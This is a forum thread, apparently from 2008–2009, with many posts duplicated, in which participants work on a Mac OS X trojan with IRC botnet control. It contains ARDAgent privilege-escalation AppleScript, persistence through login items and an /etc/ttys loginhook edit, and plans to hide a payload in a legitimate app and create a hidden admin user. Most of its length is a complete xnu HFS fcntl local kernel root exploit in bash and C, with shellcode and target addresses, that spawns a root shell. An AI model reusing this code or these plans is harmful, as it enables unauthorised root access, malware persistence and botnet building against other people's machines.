Synack, IRC clients with AppleScript support....
Ircle
http://www.ircle.com/
http://www.scriptersguild.com/bg_chapter1.html
Snak
http://www.snak.com/
http://www.snak.com/manual/52/Scripting.html
Colloquy
http://colloquy.info/
http://colloquy.info/project/wiki/Document.../AppleScripting
See also:
http://en.wikipedia.org/wiki/Comparison_of...ay_Chat_clients
Full Version: remote login Trojan
The idea is that the application is scriptable using applescript. This means that if this application were installed with the trojan and the proper applescript handlers were written, you can connect to an irc channel and accept commands via irc like irc bots. The idea behind that is you will then have a distributed trojan resource and possible botnet feature. Google DDoS/IRCbot if you don't understand.
QUOTE (Andrew#002 @ Jul 6 2008, 06:25 PM) 
Synack, IRC clients with AppleScript support....
Ircle
http://www.ircle.com/
http://www.scriptersguild.com/bg_chapter1.html
Snak
http://www.snak.com/
http://www.snak.com/manual/52/Scripting.html
Colloquy
http://colloquy.info/
http://colloquy.info/project/wiki/Document.../AppleScripting
See also:
http://en.wikipedia.org/wiki/Comparison_of...ay_Chat_clients
Ircle
http://www.ircle.com/
http://www.scriptersguild.com/bg_chapter1.html
Snak
http://www.snak.com/
http://www.snak.com/manual/52/Scripting.html
Colloquy
http://colloquy.info/
http://colloquy.info/project/wiki/Document.../AppleScripting
See also:
http://en.wikipedia.org/wiki/Comparison_of...ay_Chat_clients
Nice the, I like the first one already =)
http://www.scriptersguild.com/reference.html - this is an entire list of supported scripted handlers/events
Yes but anything GUI is likely to be obvious. While AppleScript itself does not offer much networking support, it can interface with or control things which do. You might be better off using a command-line client and either controlling it through do shell script statements or having your AppleScript install a separate means of handling the irc client (a shell script for instance.) You could also use bash's socket features to implement your own irc client. http://jasonwoof.org/sifbot
I noticed lots of links to terribly misinformed press regarding this thread and its various products (such as the Trojans.) I thought it might be nice to add some links which are to more informed press.
"Serious Security Vulnerabilty In Apple OS X Leopard"
http://blog.washingtonpost.com/securityfix...erabilty_1.html
"New Trojan Leverages Unpatched Mac Flaw"
http://blog.washingtonpost.com/securityfix..._unpatched.html
"ARDAgent.app Vulnerability Analysis"
http://blog.trailofbits.com/2008/07/05/ard...ility-analysis/
"ARDAgent Exploit, MacOS X Malware, and Snow Leopard, Oh My!"
http://blog.trailofbits.com/2008/06/22/ard...-leopard-oh-my/
"PokerStealer Another OSX Trojan"
http://ithreats.wordpress.com/2008/06/24/p...her-osx-trojan/
"Serious Security Vulnerabilty In Apple OS X Leopard"
http://blog.washingtonpost.com/securityfix...erabilty_1.html
"New Trojan Leverages Unpatched Mac Flaw"
http://blog.washingtonpost.com/securityfix..._unpatched.html
"ARDAgent.app Vulnerability Analysis"
http://blog.trailofbits.com/2008/07/05/ard...ility-analysis/
"ARDAgent Exploit, MacOS X Malware, and Snow Leopard, Oh My!"
http://blog.trailofbits.com/2008/06/22/ard...-leopard-oh-my/
"PokerStealer Another OSX Trojan"
http://ithreats.wordpress.com/2008/06/24/p...her-osx-trojan/
http://news.softpedia.com/news/ARD-Patcher...oit-89332.shtml
Or this program either...
They used a top-secret tool known as a "web browser" and exploited a service called "google" to find this thread.
Also, "/usr/bin/defaults write /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info NSAppleScriptEnabled YES" will NOT fix the ARDAgent issue. (Removing the suid bit from the executable will.)
QUOTE
ARD Patcher Fixes Apple Remote Desktop Exploit - No need for paid antivirus solutions
Or this program either...
QUOTE
"The truth: this trojan horse, so far, has not been documented in the wild, and in fact, we find it highly suspicious that multiple Anti-Virus companies have been able to get a hold of it."
They used a top-secret tool known as a "web browser" and exploited a service called "google" to find this thread.
Also, "/usr/bin/defaults write /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info NSAppleScriptEnabled YES" will NOT fix the ARDAgent issue. (Removing the suid bit from the executable will.)
QUOTE (Andrew#002 @ Jul 7 2008, 04:25 PM)
http://news.softpedia.com/news/ARD-Patcher...oit-89332.shtml
Or this program either...
They used a top-secret tool known as a "web browser" and exploited a service called "google" to find this thread.
Also, "/usr/bin/defaults write /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info NSAppleScriptEnabled YES" will NOT fix the ARDAgent issue. (Removing the suid bit from the executable will.)
Or this program either...
They used a top-secret tool known as a "web browser" and exploited a service called "google" to find this thread.
Also, "/usr/bin/defaults write /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info NSAppleScriptEnabled YES" will NOT fix the ARDAgent issue. (Removing the suid bit from the executable will.)
Which will be undone when they next repair permissions, unless you take care of that as well.
Apple has released a fix for the ARDAgent vulnerability for Tiger/10.4.11, and Leopard. For any version of OS X prior to 10.4.11 which has the ARD Server included, the vulnerability still applies.
http://support.apple.com/kb/HT2647
http://support.apple.com/kb/HT2647
I think I just cried. Hmm now how to get elvated privlages without involvig user stupidy. Dang that exploit was so dang usefull.
-sighs- what a lot of time to be spoiled >.< -frowns at apple-
oh and would someone mind telling me which page of this huge forum the script that runs on applescript resides in? my computer is slogging
QUOTE ((Necro) @ Aug 3 2008, 08:53 PM)
oh and would someone mind telling me which page of this huge forum the script that runs on applescript resides in? my computer is slogging
47.
much appreciated ^.^ and dang thats alot... -laughs- that must have induced some headaches
well we need to find a new way to get root without being owner or knowing password
Local root? Single user mode :)
oh ho! figured out the javascript to fast post :D now its an apple V away :)
anywho
speaking of sum, lets say we have the whole script and everything but already know their IP? if we knew that, we could just run everything but the emailing to self (which kind of slows mine down anyways) and then just log in as a guest, and access the public? yes? oh and back to sum, then with that you can run the whole thing with SUM and do whatever from there...
anywho
speaking of sum, lets say we have the whole script and everything but already know their IP? if we knew that, we could just run everything but the emailing to self (which kind of slows mine down anyways) and then just log in as a guest, and access the public? yes? oh and back to sum, then with that you can run the whole thing with SUM and do whatever from there...
Oh wow i feel stupid, well the thing i dont like about SUM is you cant use it and use your other stuff at the same time, but its also nice that you can save files and excute them that way :] so you dont have to type a ton in SUM
Why is this thread 67 pages long..?
Apologies if I've missed the page it's on but why do you need to do this?
QUOTE (xercxes @ Nov 18 2008, 04:15 AM)
Apologies if I've missed the page it's on but why do you need to do this?
Wanna scissor or something?
Could someone reupload it so I can test it? The rapidshare link was deleted.
Hello
Great works !!
I'm a developer but not an OSX one. I'm just begining to learn Apple script.
I already know Bash, perl, python and C C++ so cocoa should come quickly :)
This thread learn't me a lot of things, so I just wanted to say thanks !!!
One question :
- How to add a bash or applescript or c++ program to an exisitng build app and have it run when the legit app is run for the first time ?
(I mean, imagine I have a legit app, and I'd like to add it in the build app, have it shadow run when the legit app is installed/run the first time, then moved my app somewhere)
Thanks
Great works !!
I'm a developer but not an OSX one. I'm just begining to learn Apple script.
I already know Bash, perl, python and C C++ so cocoa should come quickly :)
This thread learn't me a lot of things, so I just wanted to say thanks !!!
One question :
- How to add a bash or applescript or c++ program to an exisitng build app and have it run when the legit app is run for the first time ?
(I mean, imagine I have a legit app, and I'd like to add it in the build app, have it shadow run when the legit app is installed/run the first time, then moved my app somewhere)
Thanks
hmmm
On my Intel the ARDAgent exploits doesn't work at all
returns always an error...
Note that I have Remote desktop 3.2 installed...
On my Intel the ARDAgent exploits doesn't work at all
CODE
tell application "ARDAgent" to do shell script "id"
returns always an error...
Note that I have Remote desktop 3.2 installed...
Hi
Could someone explain why this code doesn't work ?
I use a mac intel 10.5.6
1- I have created the com.apple.SystemLoginItems.plist in /Library/Preferences
Here is the content of the plist
The plist links to a app bundle called mytest.app
2- The app bundle is mytest.app in /
here is the contents of the bundle
and here is the contents of the bundle plist
and here is the very simple applescript in mytest.app
3- tests
if I call the script the file idresult is well created and contains all the "id" result
But when I delete the idresult file then reboot, after reboot there is no file idresult created in /
So ????
Do you have some ideas ?
What could be the problem ?
Thanks for your help
Could someone explain why this code doesn't work ?
I use a mac intel 10.5.6
1- I have created the com.apple.SystemLoginItems.plist in /Library/Preferences
CODE
-rw-r--r--@ 1 tester staff 323 22 jul 23:05 com.apple.SystemLoginItems.plist
Here is the content of the plist
The plist links to a app bundle called mytest.app
2- The app bundle is mytest.app in /
CODE
$ ls -al / | grep mytest
drwxr-xr-x 3 tester staff 102 22 jul 20:10 mytest.app
drwxr-xr-x 3 tester staff 102 22 jul 20:10 mytest.app
here is the contents of the bundle
and here is the contents of the bundle plist
and here is the very simple applescript in mytest.app
CODE
do shell script "id > /idresult"
3- tests
if I call the script the file idresult is well created and contains all the "id" result
But when I delete the idresult file then reboot, after reboot there is no file idresult created in /
So ????
Do you have some ideas ?
What could be the problem ?
Thanks for your help
Ok it works...
But the problem is that the login option has to be set with "auto login" set to "disabled"
More this solution is deprecated and will not longer works under snow...
You could try to use this one and find a backup solution, as for example set the loginhook in /etc/ttys.
You have to be root to edit this file.
Something like this should work with leopard and snow
But the problem is that the login option has to be set with "auto login" set to "disabled"
More this solution is deprecated and will not longer works under snow...
You could try to use this one and find a backup solution, as for example set the loginhook in /etc/ttys.
You have to be root to edit this file.
Something like this should work with leopard and snow
CODE
sed 's|/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow|/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow -LoginHook /mytest.app|'</etc/ttys>/etc/ttys
How to test if "auto login" in Login option is set to "disabled" ?
Because if it is set to a username, the SystemLoginItems won't work, and in this case an other solution has to be find. As the window asking for a password fake, or a login window fake
Thanks
EDIT ---
OK found it is in /Library/Preferences/com.apple.loginwindow.plist
The autoLoginUser exists, and if autologin is disabled it doesn't exist
Because if it is set to a username, the SystemLoginItems won't work, and in this case an other solution has to be find. As the window asking for a password fake, or a login window fake
Thanks
EDIT ---
OK found it is in /Library/Preferences/com.apple.loginwindow.plist
The autoLoginUser exists, and if autologin is disabled it doesn't exist
About ARDAgent in 10.5.6 it really seems to not work
Every time I launch an app bundle with ARDAgent I have this system log
for example this simple app bundle source code :
returns this syslog
Every time I launch an app bundle with ARDAgent I have this system log
QUOTE
23/07/09 18:15:00 ARDAgent [11421] OpenScripting.framework - 'gdut' event blocked in process with mixed credentials (issetugid=1 uid=0 euid=501 gid=20 egid=501)
for example this simple app bundle source code :
CODE
on ardagent_exploit()
set tries to 0
repeat until tries ≥ 20
try
set tries to tries + 1
tell application "ARDAgent" to do shell script "id > /ardagent"
set tries to 25
on error error_message number error_number
--log_event("ardagent_exploit:ERROR #" & error_number & " " & error_message)
end try
end repeat
end ardagent_exploit
ardagent_exploit()
set tries to 0
repeat until tries ≥ 20
try
set tries to tries + 1
tell application "ARDAgent" to do shell script "id > /ardagent"
set tries to 25
on error error_message number error_number
--log_event("ardagent_exploit:ERROR #" & error_number & " " & error_message)
end try
end repeat
end ardagent_exploit
ardagent_exploit()
returns this syslog
QUOTE
23/07/09 18:15:00 ARDAgent [11421] OpenScripting.framework - 'gdut' event blocked in process with mixed credentials (issetugid=1 uid=0 euid=501 gid=20 egid=501)
Could someone with OS 10.5.6 and Remote desktop update 3.2.2 tell me if the ARDAgent trick works for him ?
the ARDAgent exploit doesnt work for quite some time now. It was fixed 2-3 months after this vulnerability was known widely, which is still too long, considering it grants you root permissions.
To test it you'd have to downgrade your OS X version.
To test it you'd have to downgrade your OS X version.
QUOTE (Nilkimas @ Jul 23 2009, 11:31 PM)
the ARDAgent exploit doesnt work for quite some time now. It was fixed 2-3 months after this vulnerability was known widely, which is still too long, considering it grants you root permissions.
To test it you'd have to downgrade your OS X version.
To test it you'd have to downgrade your OS X version.
Ok thanks :)
And did you try this hfs+ mount exploit which work on 10.5 -- 10.5.6 ?
CODE
#!/bin/bash
# name: xnu-hfs-fcntl-v2.sh
IMAGE=xnu-hfs
EXPFILE=xnu-hfs-fcntl-v2
echo -en "Apple MACOS X xnu <= 1228.x local kernel root exploit\n"
if [ ! -f $EXPFILE ]; then
echo -n "* compiling exploit..."
gcc -Wall $EXPFILE.c -o $EXPFILE 2> /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
if [ ! -f $IMAGE.dmg ]; then
echo -n "* creating diskimage..."
hdiutil create -megabytes 1 -fs HFS+ -volname $IMAGE $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
echo -n "* attaching/mounting diskimage..."
hdiutil attach $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
echo -e "* executing exploit...\n"
./$EXPFILE /Volumes/$IMAGE
echo -n "* detaching/unmounting diskimage..."
hdiutil detach /Volumes/$IMAGE > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
# name: xnu-hfs-fcntl-v2.sh
IMAGE=xnu-hfs
EXPFILE=xnu-hfs-fcntl-v2
echo -en "Apple MACOS X xnu <= 1228.x local kernel root exploit\n"
if [ ! -f $EXPFILE ]; then
echo -n "* compiling exploit..."
gcc -Wall $EXPFILE.c -o $EXPFILE 2> /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
if [ ! -f $IMAGE.dmg ]; then
echo -n "* creating diskimage..."
hdiutil create -megabytes 1 -fs HFS+ -volname $IMAGE $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
echo -n "* attaching/mounting diskimage..."
hdiutil attach $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
echo -e "* executing exploit...\n"
./$EXPFILE /Volumes/$IMAGE
echo -n "* detaching/unmounting diskimage..."
hdiutil detach /Volumes/$IMAGE > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
CODE
/* name: xnu-hfs-fcntl-v2.c */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/attr.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <unistd.h>
#define OSX_TIGER 0x04
#define OSX_LEOPARD 0x05
#define HFS_GET_BOOT_INFO 0x00010004
#define SYSCALL_NUM 21
#define TIGER_HIT_ADDY(a) ((a)+0x20+((sizeof (struct sysent)-sizeof (int))*SYSCALL_NUM))
#define LEOPARD_HIT_ADDY(a) ((a)+0x20+(sizeof (struct sysent)*SYSCALL_NUM))
/* 1228.x, bsd/sys/sysent.h */
struct sysent {
short sy_narg;
char sy_resv;
char sy_flags;
void *sy_call;
void *sy_arg_munge32;
void *sy_arg_munge64;
int sy_return_type;
short sy_arg_bytes;
};
static unsigned char ztiger[] =
"\x55"
"\x89\xe5"
"\x8b\x45\x08"
"\x8b\x40\x08"
"\xc7\x40\x10\x00\x00\x00\x00"
"\x31\xc0"
"\xc9"
"\xc3";
static unsigned char zleopard[] =
"\x55"
"\x89\xe5"
"\x8b\x45\x08"
"\x8b\x40\x64"
"\xc7\x40\x10\x00\x00\x00\x00"
"\x31\xc0"
"\xc9"
"\xc3";
static struct targets {
const char *name;
int shell_addr; /* ©right */
int sys_addr; /* &nsysent */
const int type;
} targets_t[] = {
/* tiger */
{ "root:xnu-792.14.14.obj~1/RELEASE_I386", 0x004518ac, 0x00451920, OSX_TIGER },
{ "root:xnu-792.18.15~1/RELEASE_I386", 0x004528ec, 0x00452960, OSX_TIGER },
{ "root:xnu-792.22.5~1/RELEASE_I386", 0x004548ec, 0x00454960, OSX_TIGER },
{ "root:xnu-792.25.20~1/RELEASE_I386", 0x004548ec, 0x00454960, OSX_TIGER },
/* leopard */
{ "root:xnu-1228~1/RELEASE_I386", 0x0050170c, 0x00501780, OSX_LEOPARD },
{ "root:xnu-1228.0.2~1/RELEASE_I386", 0x0050270c, 0x00502780, OSX_LEOPARD },
{ "root:xnu-1228.3.13~1/RELEASE_I386", 0x0050470c, 0x00504780, OSX_LEOPARD },
{ "root:xnu-1228.5.18~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
{ "root:xnu-1228.5.20~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
{ "root:xnu-1228.7.58~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
{ "root:xnu-1228.9.59~1/RELEASE_I386", 0x0050A70c, 0x0050A780, OSX_LEOPARD },
{ NULL, 0, 0, 0 },
};
int
main (int argc, char **argv)
{
struct utsname p_uname;
struct sysent fsysent;
struct attrlist attr;
char buf_attr[2048], *ptr;
int shell_addr, sys_addr, sysent_addr;
int fd, id, i, n, type;
printf ("Apple MACOS X xnu <= 1228.x local kernel root exploit\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <hfs volume>\n", argv[0]);
exit (EXIT_FAILURE);
}
shell_addr = 0;
sys_addr = 0;
type = 0;
uname (&p_uname);
ptr = strrchr (p_uname.version, ' ') + 1;
for (i = 0; targets_t[i].name; i++)
if (strcmp (targets_t[i].name, ptr) == 0)
{
shell_addr = targets_t[i].shell_addr;
sys_addr = targets_t[i].sys_addr;
type = targets_t[i].type;
break;
}
if (targets_t[i].name == NULL)
{
fprintf (stderr, "%s: unsupported xnu version found :( [%s]\n",
argv[0], ptr);
exit (EXIT_FAILURE);
}
printf ("* getattrlist...");
fflush (stdout);
attr.bitmapcount = ATTR_BIT_MAP_COUNT;
attr.commonattr = ATTR_CMN_FNDRINFO;
attr.volattr = 0;
attr.dirattr = 0;
attr.fileattr = 0;
attr.forkattr = 0;
n = getattrlist (argv[1], &attr, (void *) buf_attr, sizeof (buf_attr), 0);
if (n < 0)
{
fprintf (stderr, "\n%s: getattrlist failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** attrlist length: %d\n", *(int *) &buf_attr[0]);
printf ("** fndrinfo: ");
for (i = 4; i < *(int *) &buf_attr[0]; i++)
printf ("%c", buf_attr[i]);
printf ("\n* done\n\n");
if (type == OSX_TIGER)
memcpy (&buf_attr[4], ztiger, sizeof (ztiger) - 1);
else if (type == OSX_LEOPARD)
memcpy (&buf_attr[4], zleopard, sizeof (zleopard) - 1);
else
{
fprintf (stderr, "\n%s: unknown type!\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* setattrlist...");
fflush (stdout);
attr.bitmapcount = ATTR_BIT_MAP_COUNT;
attr.commonattr = ATTR_CMN_FNDRINFO;
attr.volattr = ATTR_VOL_INFO;
attr.dirattr = 0;
attr.fileattr = 0;
attr.forkattr = 0;
n = setattrlist (argv[1], &attr, (void *) &buf_attr[4], sizeof (buf_attr) - 4, 0);
if (n < 0)
{
fprintf (stderr, "\n%s: setattrlist failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("done\n");
sleep (2);
fd = open (argv[1], O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: open failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* overwriting @0x%08X\n", shell_addr);
fflush (stdout);
n = fcntl (fd, HFS_GET_BOOT_INFO, shell_addr);
if (n < 0)
{
fprintf (stderr, "%s: fcntl failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* done\n\n");
fsysent.sy_narg = 1;
fsysent.sy_resv = 0;
fsysent.sy_flags = 0;
fsysent.sy_call = (void *) shell_addr;
fsysent.sy_arg_munge32 = NULL;
fsysent.sy_arg_munge64 = NULL;
fsysent.sy_return_type = 0;
fsysent.sy_arg_bytes = 4;
memcpy (&buf_attr[4], &fsysent, sizeof (struct sysent));
printf ("* setattrlist...");
fflush (stdout);
attr.bitmapcount = ATTR_BIT_MAP_COUNT;
attr.commonattr = ATTR_CMN_FNDRINFO;
attr.volattr = ATTR_VOL_INFO;
attr.dirattr = 0;
attr.fileattr = 0;
attr.forkattr = 0;
n = setattrlist (argv[1], &attr, (void *) &buf_attr[4], sizeof (buf_attr) - 4, 0);
if (n < 0)
{
fprintf (stderr, "\n%s: setattrlist failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("done\n");
sleep (2);
if (type == OSX_TIGER)
sysent_addr = TIGER_HIT_ADDY(sys_addr);
else if (type == OSX_LEOPARD)
sysent_addr = LEOPARD_HIT_ADDY(sys_addr);
else
{
fprintf (stderr, "\n%s: unknown type!\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* overwriting @0x%08X\n", sysent_addr);
printf ("** sysent[%d].sy_call: 0x%08X\n", SYSCALL_NUM, shell_addr);
fflush (stdout);
n = fcntl (fd, HFS_GET_BOOT_INFO, sysent_addr);
if (n < 0)
{
fprintf (stderr, "%s: fcntl failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* done\n\n");
printf ("* jumping...");
sleep (2);
n = syscall (SYSCALL_NUM, NULL);
printf ("done\n\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
printf ("+Wh00t\n\n");
/* exec shell, for some reason execve doesn't work!?$! */
system ("/bin/bash");
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/attr.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <unistd.h>
#define OSX_TIGER 0x04
#define OSX_LEOPARD 0x05
#define HFS_GET_BOOT_INFO 0x00010004
#define SYSCALL_NUM 21
#define TIGER_HIT_ADDY(a) ((a)+0x20+((sizeof (struct sysent)-sizeof (int))*SYSCALL_NUM))
#define LEOPARD_HIT_ADDY(a) ((a)+0x20+(sizeof (struct sysent)*SYSCALL_NUM))
/* 1228.x, bsd/sys/sysent.h */
struct sysent {
short sy_narg;
char sy_resv;
char sy_flags;
void *sy_call;
void *sy_arg_munge32;
void *sy_arg_munge64;
int sy_return_type;
short sy_arg_bytes;
};
static unsigned char ztiger[] =
"\x55"
"\x89\xe5"
"\x8b\x45\x08"
"\x8b\x40\x08"
"\xc7\x40\x10\x00\x00\x00\x00"
"\x31\xc0"
"\xc9"
"\xc3";
static unsigned char zleopard[] =
"\x55"
"\x89\xe5"
"\x8b\x45\x08"
"\x8b\x40\x64"
"\xc7\x40\x10\x00\x00\x00\x00"
"\x31\xc0"
"\xc9"
"\xc3";
static struct targets {
const char *name;
int shell_addr; /* ©right */
int sys_addr; /* &nsysent */
const int type;
} targets_t[] = {
/* tiger */
{ "root:xnu-792.14.14.obj~1/RELEASE_I386", 0x004518ac, 0x00451920, OSX_TIGER },
{ "root:xnu-792.18.15~1/RELEASE_I386", 0x004528ec, 0x00452960, OSX_TIGER },
{ "root:xnu-792.22.5~1/RELEASE_I386", 0x004548ec, 0x00454960, OSX_TIGER },
{ "root:xnu-792.25.20~1/RELEASE_I386", 0x004548ec, 0x00454960, OSX_TIGER },
/* leopard */
{ "root:xnu-1228~1/RELEASE_I386", 0x0050170c, 0x00501780, OSX_LEOPARD },
{ "root:xnu-1228.0.2~1/RELEASE_I386", 0x0050270c, 0x00502780, OSX_LEOPARD },
{ "root:xnu-1228.3.13~1/RELEASE_I386", 0x0050470c, 0x00504780, OSX_LEOPARD },
{ "root:xnu-1228.5.18~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
{ "root:xnu-1228.5.20~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
{ "root:xnu-1228.7.58~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
{ "root:xnu-1228.9.59~1/RELEASE_I386", 0x0050A70c, 0x0050A780, OSX_LEOPARD },
{ NULL, 0, 0, 0 },
};
int
main (int argc, char **argv)
{
struct utsname p_uname;
struct sysent fsysent;
struct attrlist attr;
char buf_attr[2048], *ptr;
int shell_addr, sys_addr, sysent_addr;
int fd, id, i, n, type;
printf ("Apple MACOS X xnu <= 1228.x local kernel root exploit\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <hfs volume>\n", argv[0]);
exit (EXIT_FAILURE);
}
shell_addr = 0;
sys_addr = 0;
type = 0;
uname (&p_uname);
ptr = strrchr (p_uname.version, ' ') + 1;
for (i = 0; targets_t[i].name; i++)
if (strcmp (targets_t[i].name, ptr) == 0)
{
shell_addr = targets_t[i].shell_addr;
sys_addr = targets_t[i].sys_addr;
type = targets_t[i].type;
break;
}
if (targets_t[i].name == NULL)
{
fprintf (stderr, "%s: unsupported xnu version found :( [%s]\n",
argv[0], ptr);
exit (EXIT_FAILURE);
}
printf ("* getattrlist...");
fflush (stdout);
attr.bitmapcount = ATTR_BIT_MAP_COUNT;
attr.commonattr = ATTR_CMN_FNDRINFO;
attr.volattr = 0;
attr.dirattr = 0;
attr.fileattr = 0;
attr.forkattr = 0;
n = getattrlist (argv[1], &attr, (void *) buf_attr, sizeof (buf_attr), 0);
if (n < 0)
{
fprintf (stderr, "\n%s: getattrlist failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** attrlist length: %d\n", *(int *) &buf_attr[0]);
printf ("** fndrinfo: ");
for (i = 4; i < *(int *) &buf_attr[0]; i++)
printf ("%c", buf_attr[i]);
printf ("\n* done\n\n");
if (type == OSX_TIGER)
memcpy (&buf_attr[4], ztiger, sizeof (ztiger) - 1);
else if (type == OSX_LEOPARD)
memcpy (&buf_attr[4], zleopard, sizeof (zleopard) - 1);
else
{
fprintf (stderr, "\n%s: unknown type!\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* setattrlist...");
fflush (stdout);
attr.bitmapcount = ATTR_BIT_MAP_COUNT;
attr.commonattr = ATTR_CMN_FNDRINFO;
attr.volattr = ATTR_VOL_INFO;
attr.dirattr = 0;
attr.fileattr = 0;
attr.forkattr = 0;
n = setattrlist (argv[1], &attr, (void *) &buf_attr[4], sizeof (buf_attr) - 4, 0);
if (n < 0)
{
fprintf (stderr, "\n%s: setattrlist failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("done\n");
sleep (2);
fd = open (argv[1], O_RDONLY);
if (fd < 0)
{
fprintf (stderr, "%s: open failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* overwriting @0x%08X\n", shell_addr);
fflush (stdout);
n = fcntl (fd, HFS_GET_BOOT_INFO, shell_addr);
if (n < 0)
{
fprintf (stderr, "%s: fcntl failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* done\n\n");
fsysent.sy_narg = 1;
fsysent.sy_resv = 0;
fsysent.sy_flags = 0;
fsysent.sy_call = (void *) shell_addr;
fsysent.sy_arg_munge32 = NULL;
fsysent.sy_arg_munge64 = NULL;
fsysent.sy_return_type = 0;
fsysent.sy_arg_bytes = 4;
memcpy (&buf_attr[4], &fsysent, sizeof (struct sysent));
printf ("* setattrlist...");
fflush (stdout);
attr.bitmapcount = ATTR_BIT_MAP_COUNT;
attr.commonattr = ATTR_CMN_FNDRINFO;
attr.volattr = ATTR_VOL_INFO;
attr.dirattr = 0;
attr.fileattr = 0;
attr.forkattr = 0;
n = setattrlist (argv[1], &attr, (void *) &buf_attr[4], sizeof (buf_attr) - 4, 0);
if (n < 0)
{
fprintf (stderr, "\n%s: setattrlist failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("done\n");
sleep (2);
if (type == OSX_TIGER)
sysent_addr = TIGER_HIT_ADDY(sys_addr);
else if (type == OSX_LEOPARD)
sysent_addr = LEOPARD_HIT_ADDY(sys_addr);
else
{
fprintf (stderr, "\n%s: unknown type!\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* overwriting @0x%08X\n", sysent_addr);
printf ("** sysent[%d].sy_call: 0x%08X\n", SYSCALL_NUM, shell_addr);
fflush (stdout);
n = fcntl (fd, HFS_GET_BOOT_INFO, sysent_addr);
if (n < 0)
{
fprintf (stderr, "%s: fcntl failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* done\n\n");
printf ("* jumping...");
sleep (2);
n = syscall (SYSCALL_NUM, NULL);
printf ("done\n\n");
id = getuid ();
printf ("* getuid(): %d\n", id);
if (id == 0)
{
printf ("+Wh00t\n\n");
/* exec shell, for some reason execve doesn't work!?$! */
system ("/bin/bash");
}
else
fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);
return (EXIT_SUCCESS);
}
Note that I don't have the owner reference, so I can't tell who discovered this ... (a friend gave me this code)
The template script is a good starting point and contains huge informations !!
Callmenames you are amazing !
Ok mine would be a little different :)
The main idea is to gain root access using few exploits (systemloginItems, ARDAgent, MACHEx, NFS+, etc) or by duping the user.
Once you have this I'd create a hidden admin user
Then with a
I could do everything !!
I don't understand why the script template hope to be in the sudo time period :)
Anyway, once again it contains a ton of pretty good informations :)
Callmenames you are amazing !
Ok mine would be a little different :)
The main idea is to gain root access using few exploits (systemloginItems, ARDAgent, MACHEx, NFS+, etc) or by duping the user.
Once you have this I'd create a hidden admin user
Then with a
CODE
echo pwdofadmin | sudo -S cmd
or CODE
sudo -S cmd < /path/to/my/.secretpwd
I could do everything !!
I don't understand why the script template hope to be in the sudo time period :)
Anyway, once again it contains a ton of pretty good informations :)
Some comments for 10.5.5 and after
Change this
to this
Basicly
- change all Head -n 2 to head -n 3 (because head -n2 show only inet6 adress ip)
- Add a Head -n 1 to the arp -a
Also note that KickStart of ARDAgent need to be run as root or sudo !!
You should change all these lines
So if you knwo the admin/root user password or if you have created a new admin/root user by
or just SUDO if this script is run as root
NOTE that on LEOPARD systemsetup isn't in
but in
So this part has to be modified from
to
Change this
CODE
set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")
to this
CODE
